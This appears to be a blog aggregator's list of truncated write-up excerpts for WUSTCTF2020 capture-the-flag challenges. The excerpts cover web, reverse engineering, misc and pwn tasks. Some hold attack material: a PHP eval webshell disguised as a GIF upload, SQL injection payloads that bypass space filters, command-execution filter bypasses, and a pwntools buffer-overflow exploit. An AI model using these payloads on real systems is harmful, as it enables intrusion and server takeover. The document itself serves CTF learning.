- 2024-07-17[WUSTCTF2020]朴实无华(命令执行)
请求头问题去查了一下资料了解了一下没有什莫用robots.txt中有东西假flag但是请求头里有重要消息访问页面/fl4g.php<imgsrc="/img.jpg"><?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level1if(isse
- 2024-07-17[WUSTCTF2020]Cr0ssfun
64位,进ida没啥重要的,主要是check函数等于1才能跳出后面是一个函数可以看到都是数组,后面还有几个这样的函数,就不都截图了,直接上EXP吧a1=33*[0]a1[1]=99a1[25]=64a1[27]=101a1[4]=50a1[17]=114a1[29]=102a1[17]=114a1[24]=95a1[2]=116a1[9]=
- 2024-07-15[WUSTCTF2020]level3
拖入ida,是一个base64串,但是用工具还原不了猜测是密钥变了,此时看到了另一个函数,这个函数改变了base64密钥写个脚本给他运行一下,后面是改完的key和输出结果importbase64a='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'b=list(a)foriinrange
- 2024-06-10[WUSTCTF2020]朴实无华1
知识点:1.目录扫描 2.burp抓包 3.弱类型比较绕过 4.科学计数法,md5碰撞 5.系统命令以及空格的替换用dirsearch扫一下目录 ~dirsearch-etxt,bak,zip,tgz-uip-t
- 2024-05-04[WUSTCTF2020]CV Maker
[WUSTCTF2020]CVMaker打开环境注册了账号登陆,发现有上传头像的地方,尝试上传文件可以上传图片马GIF89a<scriptlanguage='php'>@eval($_POST['shell']);</script>BP里抓包改为php,得到上传成功路径http://1d2ee33c-dfe2-49ec-88c3-d3305f7bd2f3.node5.buuoj.cn:81/upload
- 2024-04-30[WUSTCTF2020]颜值成绩查询
[WUSTCTF2020]颜值成绩查询打开环境是一个成绩查询的页面1.手工注入输入1发现有admin的账号和得分输入1'会提示学号不存在1/**/or/**/1=1#过滤了空格1/**/order/**/by/**/3#存在1/**/order/**/by/**/4#不存在由此得知有3个字段1/**/union/**/select/**/1,2,
- 2024-04-07[WUSTCTF2020]spaceclub
[WUSTCTF2020]spaceclub附件是一个txt文件,打开发现是空白的ctrl+a全选下发现还是有内容的通过脚本进行替换,长的替换为1,短的替换为0importbinasciif=open("attachment.txt","r")content=f.readlines()s=""forlineincontent:iflen(line)==7:s+="0&qu
- 2024-02-12[WUSTCTF2020]朴实无华
[WUSTCTF2020]朴实无华robots.txt里发现提示打开这个页面,虽然页面里没有有用的信息,但是在响应头里发现了另一个页面提示打开发现代码<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level1if(isset($_GET
- 2023-12-31wustctf2020_getshell
wustctf2020_getshellret2shell在vulnerable函数中存在溢出漏洞shell函数中已经预留了后门溢出->跳转到后门函数frompwnimport*context.log_level='debug'elf=ELF('wustctf2020_getshell')io=process('wustctf2020_getshell')payload=b'A
- 2023-11-14[WUSTCTF2020]girlfriend
下载了一个音频文件,打开来听起来像是在打电话输入号码的声音,猜测DTMF拨号音识别,有个程序可以识别一下dtmf2num.exe,通过链接可以下载http://aluigi.altervista.org/mytoolz/dtmf2num.zipDTMF2NUM0.2byLuigiAuriemmae-mail:
[email protected]:aluigi.org-open
- 2023-10-30[WUSTCTF2020]alison_likes_jojo
boki图片中有隐藏文件压缩包需要密码暴力破解出密码888866解压得到信息经过三次base64解码后得到信息得到密码,这是另一张图片outguess隐写的密码,之后到虚拟机中进行破解得到flagflag{pretty_girl_alison_likes_jojo}
- 2023-10-10[WUSTCTF2020]朴实无华 1
原理intval绕过MD5加密值和原值相等绕过命令执行空格过滤解题过程intval($num)<2020&&intval($num+1)>2021绕过:https://blog.csdn.net/qq_47804678/article/details/128814377参考文章:https://blog.csdn.net/m0_62879498/article/details/124632041
- 2023-07-26buuctf-[WUSTCTF2020]朴实无华
打开靶机显示 啥都没有,先去查看robots.txt 发现 之后再fake里面请求头中发现fl4g.php 最后绕过三层php限制 第一关intvar 可以解析科学计数法 所以传入 1e4第一个截断解析为1 第二个加一解析为10001 payload:num=1e4第二关只要是0e开头md5
- 2023-06-19BUUCTF:[WUSTCTF2020]girlfriend
下载下来一个音频文件一个题目描述使用Audacity打开这段音频Audacity官方下载Audacity是一款易于使用的多轨音频编辑器和记录器,适用于Windows,MacOSX,GNU/Linux和其他操作系统。在CTF比赛中,可以通过对音频进行频谱的分析,以及音频其他内容的分析,找到flag。听起来像是在打电话
- 2023-06-19BUUCTF:[WUSTCTF2020]spaceclub
题目地址:https://buuoj.cn/challenges#[WUSTCTF2020]spaceclub一个txt用记事本打开的话,什么都看到确有4kb的大小,联想题目名字spaceclub,使用ctrl+a全选就看清楚了notepad这样全选可能还是不太直观,我这里用sublime打开然后全选一开始以为是摩斯密码,后来发现是每一行的长短对应一个
- 2023-05-05[WUSTCTF2020]level2 1
查壳:32位,有个小壳,怎么办,脱了呗,还能这么办(方法见前文)https://www.cnblogs.com/TFOREVERY/p/17366210.html脱壳后,进入IDA找主函数:脸上就是flag{Just_upx_-d}收工。
- 2023-04-24pwn | wustctf2020_getshell
pwn|wustctf2020_getshellx86ret2textexp:frompwnimport*fromLibcSearcherimport*context.log_level='debug'p=remote('node4.buuoj.cn',28063)p.sendline(b'M'*(0x18+4)+p32(0x0804851B))p.interactive()
- 2022-12-16buuoj-[WUSTCTF2020]Cr0ssfun
1.64bitnowinexe直接打开2.找到main函数当check(flag)这个函数==1的时候,才正确3.步入:耐心一点,一个一个扣出来就行了。。。a1=[0]*33a1[10]=112a1[13]=6
- 2022-12-13buuoj-[WUSTCTF2020]level3
1.nowinexe64bit2.打开直接找到main函数是一个base64加密,加密表是:但是解出来是乱码。。然后查了一下(x)谁调用了base64表,发现了这个东西那就是变表了。。写个脚本
- 2022-12-04[WUSTCTF2020]B@se
题目附件内容: 首先通过观察题目字符特征很明显是base64编码,第一行的密文是通过下面给的base64的变表,但是仔细观察缺少了四个字符,因此我们需要写脚本把缺少的字符
- 2022-12-01buuoj [WUSTCTF2020]level1
1.nowin.exe64bit文件附带一个output.txt逻辑如上,输出在output文件里面储存编写脚本逆向操作就好了data=[0,198,232,816,200,1536,300,6144,984,51200,570,921